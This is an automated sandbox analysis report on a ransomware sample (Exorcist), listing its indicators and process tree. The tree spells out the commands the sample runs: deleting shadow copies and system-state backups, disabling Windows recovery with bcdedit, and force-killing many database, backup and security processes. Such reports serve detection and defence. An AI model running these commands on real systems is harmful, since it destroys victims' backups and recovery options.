Resubmissions
23-09-2020 10:35
200923-mkwlt9yalx 1023-07-2020 14:59
200723-mtbw6t99d2 1023-07-2020 13:47
200723-5t3mhtw95x 10Analysis
-
max time kernel
117s -
max time network
124s -
platform
windows7_x64 -
resource
win7 -
submitted
23-07-2020 13:47
Static task
static1
Behavioral task
behavioral1
Sample
build-x64-crypt.bin.exe
Resource
win7
Behavioral task
behavioral2
Sample
build-x64-crypt.bin.exe
Resource
win10
General
-
Target
build-x64-crypt.bin.exe
Malware Config
Signatures
-
Exorcist Ransomware
Ransomware-as-a-service which avoids infecting machines in CIS nations. First seen in mid-2020.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1576 bcdedit.exe 1536 bcdedit.exe -
Processes:
wbadmin.exewbadmin.exepid process 1924 wbadmin.exe 1760 wbadmin.exe -
Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
build-x64-crypt.bin.exedescription ioc process File renamed C:\Users\Admin\Pictures\CloseRequest.tiff => C:\Users\Admin\Pictures\CloseRequest.tiff.giDfJo build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\InstallRegister.tiff.giDfJo build-x64-crypt.bin.exe File renamed C:\Users\Admin\Pictures\SplitUnlock.tif => C:\Users\Admin\Pictures\SplitUnlock.tif.giDfJo build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\CloseRequest.tiff build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\CloseRequest.tiff.giDfJo build-x64-crypt.bin.exe File renamed C:\Users\Admin\Pictures\GroupInvoke.crw => C:\Users\Admin\Pictures\GroupInvoke.crw.giDfJo build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\GroupInvoke.crw.giDfJo build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\InstallRegister.tiff build-x64-crypt.bin.exe File renamed C:\Users\Admin\Pictures\InstallRegister.tiff => C:\Users\Admin\Pictures\InstallRegister.tiff.giDfJo build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\SplitUnlock.tif.giDfJo build-x64-crypt.bin.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 1304 cmd.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
build-x64-crypt.bin.exedescription ioc process File opened (read-only) \??\B: build-x64-crypt.bin.exe File opened (read-only) \??\F: build-x64-crypt.bin.exe File opened (read-only) \??\G: build-x64-crypt.bin.exe File opened (read-only) \??\M: build-x64-crypt.bin.exe File opened (read-only) \??\Q: build-x64-crypt.bin.exe File opened (read-only) \??\R: build-x64-crypt.bin.exe File opened (read-only) \??\V: build-x64-crypt.bin.exe File opened (read-only) \??\Z: build-x64-crypt.bin.exe File opened (read-only) \??\H: build-x64-crypt.bin.exe File opened (read-only) \??\L: build-x64-crypt.bin.exe File opened (read-only) \??\T: build-x64-crypt.bin.exe File opened (read-only) \??\A: build-x64-crypt.bin.exe File opened (read-only) \??\K: build-x64-crypt.bin.exe File opened (read-only) \??\N: build-x64-crypt.bin.exe File opened (read-only) \??\O: build-x64-crypt.bin.exe File opened (read-only) \??\S: build-x64-crypt.bin.exe File opened (read-only) \??\W: build-x64-crypt.bin.exe File opened (read-only) \??\X: build-x64-crypt.bin.exe File opened (read-only) \??\Y: build-x64-crypt.bin.exe File opened (read-only) \??\E: build-x64-crypt.bin.exe File opened (read-only) \??\I: build-x64-crypt.bin.exe File opened (read-only) \??\J: build-x64-crypt.bin.exe File opened (read-only) \??\P: build-x64-crypt.bin.exe File opened (read-only) \??\U: build-x64-crypt.bin.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
build-x64-crypt.bin.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\d.bmp" build-x64-crypt.bin.exe -
Drops file in Windows directory 6 IoCs
Processes:
wbadmin.exewbadmin.exedescription ioc process File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl wbadmin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 208 timeout.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1980 vssadmin.exe -
Kills process with taskkill 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1624 taskkill.exe 880 taskkill.exe 1984 taskkill.exe 1500 taskkill.exe 1864 taskkill.exe 1516 taskkill.exe 232 taskkill.exe 1928 taskkill.exe 1924 taskkill.exe 1432 taskkill.exe 600 taskkill.exe 576 taskkill.exe 1088 taskkill.exe 1088 taskkill.exe 1976 taskkill.exe 2012 taskkill.exe 1388 taskkill.exe 1968 taskkill.exe 1480 taskkill.exe 1096 taskkill.exe 1416 taskkill.exe 1080 taskkill.exe 520 taskkill.exe 520 taskkill.exe 1824 taskkill.exe 1048 taskkill.exe 1860 taskkill.exe 1976 taskkill.exe 1556 taskkill.exe 2040 taskkill.exe 2032 taskkill.exe 1876 taskkill.exe 1480 taskkill.exe 564 taskkill.exe 1388 taskkill.exe 1560 taskkill.exe 1076 taskkill.exe 208 taskkill.exe 1952 taskkill.exe 1756 taskkill.exe 1704 taskkill.exe 480 taskkill.exe 1804 taskkill.exe 1468 taskkill.exe 1532 taskkill.exe 1964 taskkill.exe 1896 taskkill.exe 2028 taskkill.exe 1096 taskkill.exe 1080 taskkill.exe 1848 taskkill.exe 216 taskkill.exe 1620 taskkill.exe 1760 taskkill.exe 1568 taskkill.exe 340 taskkill.exe 1904 taskkill.exe 1888 taskkill.exe 1936 taskkill.exe 1496 taskkill.exe 1520 taskkill.exe 1464 taskkill.exe 1884 taskkill.exe 208 taskkill.exe -
NTFS ADS 5 IoCs
Processes:
build-x64-crypt.bin.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Local\Temp\boot.sys:xbcqjlijd build-x64-crypt.bin.exe File created C:\Users\Admin\AppData\Local\Temp\boot.sys:iykxevszimranzpu build-x64-crypt.bin.exe File created C:\Users\Admin\AppData\Local\Temp\boot.sys:xbcqjlijd build-x64-crypt.bin.exe File created C:\Users\Admin\AppData\Local\Temp\boot.sys:ivrhwmenumbuocvak build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\boot.sys:tpupnbvzicwro build-x64-crypt.bin.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
build-x64-crypt.bin.exepid process 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe 284 build-x64-crypt.bin.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
WMIC.exevssvc.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeIncreaseQuotaPrivilege 1616 WMIC.exe Token: SeSecurityPrivilege 1616 WMIC.exe Token: SeTakeOwnershipPrivilege 1616 WMIC.exe Token: SeLoadDriverPrivilege 1616 WMIC.exe Token: SeSystemProfilePrivilege 1616 WMIC.exe Token: SeSystemtimePrivilege 1616 WMIC.exe Token: SeProfSingleProcessPrivilege 1616 WMIC.exe Token: SeIncBasePriorityPrivilege 1616 WMIC.exe Token: SeCreatePagefilePrivilege 1616 WMIC.exe Token: SeBackupPrivilege 1616 WMIC.exe Token: SeRestorePrivilege 1616 WMIC.exe Token: SeShutdownPrivilege 1616 WMIC.exe Token: SeDebugPrivilege 1616 WMIC.exe Token: SeSystemEnvironmentPrivilege 1616 WMIC.exe Token: SeRemoteShutdownPrivilege 1616 WMIC.exe Token: SeUndockPrivilege 1616 WMIC.exe Token: SeManageVolumePrivilege 1616 WMIC.exe Token: 33 1616 WMIC.exe Token: 34 1616 WMIC.exe Token: 35 1616 WMIC.exe Token: SeIncreaseQuotaPrivilege 1616 WMIC.exe Token: SeSecurityPrivilege 1616 WMIC.exe Token: SeTakeOwnershipPrivilege 1616 WMIC.exe Token: SeLoadDriverPrivilege 1616 WMIC.exe Token: SeSystemProfilePrivilege 1616 WMIC.exe Token: SeSystemtimePrivilege 1616 WMIC.exe Token: SeProfSingleProcessPrivilege 1616 WMIC.exe Token: SeIncBasePriorityPrivilege 1616 WMIC.exe Token: SeCreatePagefilePrivilege 1616 WMIC.exe Token: SeBackupPrivilege 1616 WMIC.exe Token: SeRestorePrivilege 1616 WMIC.exe Token: SeShutdownPrivilege 1616 WMIC.exe Token: SeDebugPrivilege 1616 WMIC.exe Token: SeSystemEnvironmentPrivilege 1616 WMIC.exe Token: SeRemoteShutdownPrivilege 1616 WMIC.exe Token: SeUndockPrivilege 1616 WMIC.exe Token: SeManageVolumePrivilege 1616 WMIC.exe Token: 33 1616 WMIC.exe Token: 34 1616 WMIC.exe Token: 35 1616 WMIC.exe Token: SeBackupPrivilege 1784 vssvc.exe Token: SeRestorePrivilege 1784 vssvc.exe Token: SeAuditPrivilege 1784 vssvc.exe Token: SeDebugPrivilege 1496 taskkill.exe Token: SeDebugPrivilege 1584 taskkill.exe Token: SeDebugPrivilege 520 taskkill.exe Token: SeDebugPrivilege 1304 taskkill.exe Token: SeDebugPrivilege 216 taskkill.exe Token: SeDebugPrivilege 600 taskkill.exe Token: SeDebugPrivilege 1904 taskkill.exe Token: SeDebugPrivilege 1612 taskkill.exe Token: SeDebugPrivilege 1620 taskkill.exe Token: SeDebugPrivilege 2012 taskkill.exe Token: SeDebugPrivilege 1048 taskkill.exe Token: SeDebugPrivilege 1388 taskkill.exe Token: SeDebugPrivilege 576 taskkill.exe Token: SeDebugPrivilege 1860 taskkill.exe Token: SeDebugPrivilege 1884 taskkill.exe Token: SeDebugPrivilege 1088 taskkill.exe Token: SeDebugPrivilege 1920 taskkill.exe Token: SeDebugPrivilege 1756 taskkill.exe Token: SeDebugPrivilege 1704 taskkill.exe Token: SeDebugPrivilege 1968 taskkill.exe Token: SeDebugPrivilege 480 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
build-x64-crypt.bin.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 284 wrote to memory of 748 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 748 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 748 284 build-x64-crypt.bin.exe cmd.exe PID 748 wrote to memory of 1616 748 cmd.exe WMIC.exe PID 748 wrote to memory of 1616 748 cmd.exe WMIC.exe PID 748 wrote to memory of 1616 748 cmd.exe WMIC.exe PID 284 wrote to memory of 1900 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 1900 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 1900 284 build-x64-crypt.bin.exe cmd.exe PID 1900 wrote to memory of 1924 1900 cmd.exe wbadmin.exe PID 1900 wrote to memory of 1924 1900 cmd.exe wbadmin.exe PID 1900 wrote to memory of 1924 1900 cmd.exe wbadmin.exe PID 284 wrote to memory of 1768 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 1768 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 1768 284 build-x64-crypt.bin.exe cmd.exe PID 1768 wrote to memory of 1760 1768 cmd.exe wbadmin.exe PID 1768 wrote to memory of 1760 1768 cmd.exe wbadmin.exe PID 1768 wrote to memory of 1760 1768 cmd.exe wbadmin.exe PID 284 wrote to memory of 1600 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 1600 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 1600 284 build-x64-crypt.bin.exe cmd.exe PID 1600 wrote to memory of 1576 1600 cmd.exe bcdedit.exe PID 1600 wrote to memory of 1576 1600 cmd.exe bcdedit.exe PID 1600 wrote to memory of 1576 1600 cmd.exe bcdedit.exe PID 284 wrote to memory of 1604 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 1604 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 1604 284 build-x64-crypt.bin.exe cmd.exe PID 1604 wrote to memory of 1536 1604 cmd.exe bcdedit.exe PID 1604 wrote to memory of 1536 1604 cmd.exe bcdedit.exe PID 1604 wrote to memory of 1536 1604 cmd.exe bcdedit.exe PID 284 wrote to memory of 1976 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 1976 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 1976 284 build-x64-crypt.bin.exe cmd.exe PID 1976 wrote to memory of 1980 1976 cmd.exe vssadmin.exe PID 1976 wrote to memory of 1980 1976 cmd.exe vssadmin.exe PID 1976 wrote to memory of 1980 1976 cmd.exe vssadmin.exe PID 284 wrote to memory of 2020 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 2020 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 2020 284 build-x64-crypt.bin.exe cmd.exe PID 2020 wrote to memory of 1028 2020 cmd.exe VSSVC.exe PID 2020 wrote to memory of 1028 2020 cmd.exe VSSVC.exe PID 2020 wrote to memory of 1028 2020 cmd.exe VSSVC.exe PID 284 wrote to memory of 2032 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 2032 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 2032 284 build-x64-crypt.bin.exe cmd.exe PID 2032 wrote to memory of 1496 2032 cmd.exe taskkill.exe PID 2032 wrote to memory of 1496 2032 cmd.exe taskkill.exe PID 2032 wrote to memory of 1496 2032 cmd.exe taskkill.exe PID 284 wrote to memory of 1400 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 1400 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 1400 284 build-x64-crypt.bin.exe cmd.exe PID 1400 wrote to memory of 1584 1400 cmd.exe taskkill.exe PID 1400 wrote to memory of 1584 1400 cmd.exe taskkill.exe PID 1400 wrote to memory of 1584 1400 cmd.exe taskkill.exe PID 284 wrote to memory of 1100 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 1100 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 1100 284 build-x64-crypt.bin.exe cmd.exe PID 1100 wrote to memory of 520 1100 cmd.exe taskkill.exe PID 1100 wrote to memory of 520 1100 cmd.exe taskkill.exe PID 1100 wrote to memory of 520 1100 cmd.exe taskkill.exe PID 284 wrote to memory of 1844 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 1844 284 build-x64-crypt.bin.exe cmd.exe PID 284 wrote to memory of 1844 284 build-x64-crypt.bin.exe cmd.exe PID 1844 wrote to memory of 1304 1844 cmd.exe taskkill.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\build-x64-crypt.bin.exe"C:\Users\Admin\AppData\Local\Temp\build-x64-crypt.bin.exe"1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /C wmic.exe SHADOWCOPY DELETE /nointeractive2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe SHADOWCOPY DELETE /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C wbadmin DELETE SYSTEMSTATEBACKUP2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP3⤵
- Deletes System State backups
- Drops file in Windows directory
-
C:\Windows\system32\cmd.execmd /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest3⤵
- Deletes System State backups
- Drops file in Windows directory
-
C:\Windows\system32\cmd.execmd /C bcdedit.exe /set {default} recoveryenabled No2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.execmd /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.execmd /C vssadmin.exe Delete Shadows /All /Quiet2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /C C:\Windows\system32\vssvc.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\VSSVC.exeC:\Windows\system32\vssvc.exe3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM wxServer*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM wxServer*3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM QBFCService*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM QBFCService*3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM QBVSS*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM QBVSS*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM sql*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM sql*3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM msaccess*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM msaccess*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM mssql*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM mssql*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM mysql*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM mysql*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM wxServerView*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM wxServerView*3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM sqlmangr*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM sqlmangr*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM RAgui*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM RAgui*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM supervise*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM supervise*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM Culture*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM Culture*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM Defwatch*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM Defwatch*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM winword*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM winword*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM QBW32*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM QBW32*3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM QBDBMgr*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM QBDBMgr*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM qbupdate*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM qbupdate*3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM axlbridge*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM axlbridge*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM httpd*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM httpd*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM fdlauncher*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM fdlauncher*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MsDtSrvr*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MsDtSrvr*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM java*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM java*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM 360se*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM 360se*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM 360doctor*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM 360doctor*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM wdswfsafe*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM wdswfsafe*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM fdhost*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM fdhost*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM GDscan*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM GDscan*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM ZhuDongFangYu*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM ZhuDongFangYu*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM QBDBMgrN*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM QBDBMgrN*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM mysqld*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM mysqld*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM AutodeskDesktopApp*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM AutodeskDesktopApp*3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM acwebbrowser*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM acwebbrowser*3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM Creative Cloud*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM Creative Cloud*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM Adobe Desktop Service*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM Adobe Desktop Service*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM CoreSync*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM CoreSync*3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM Adobe CEF Helper*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM Adobe CEF Helper*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM node*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM node*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM AdobeIPCBroker*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM AdobeIPCBroker*3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM sync-taskbar*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM sync-taskbar*3⤵
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM sync-worker*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM sync-worker*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM InputPersonalization*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM InputPersonalization*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM AdobeCollabSync*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM AdobeCollabSync*3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM BrCtrlCntr*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM BrCtrlCntr*3⤵
- Kills process with taskkill
-
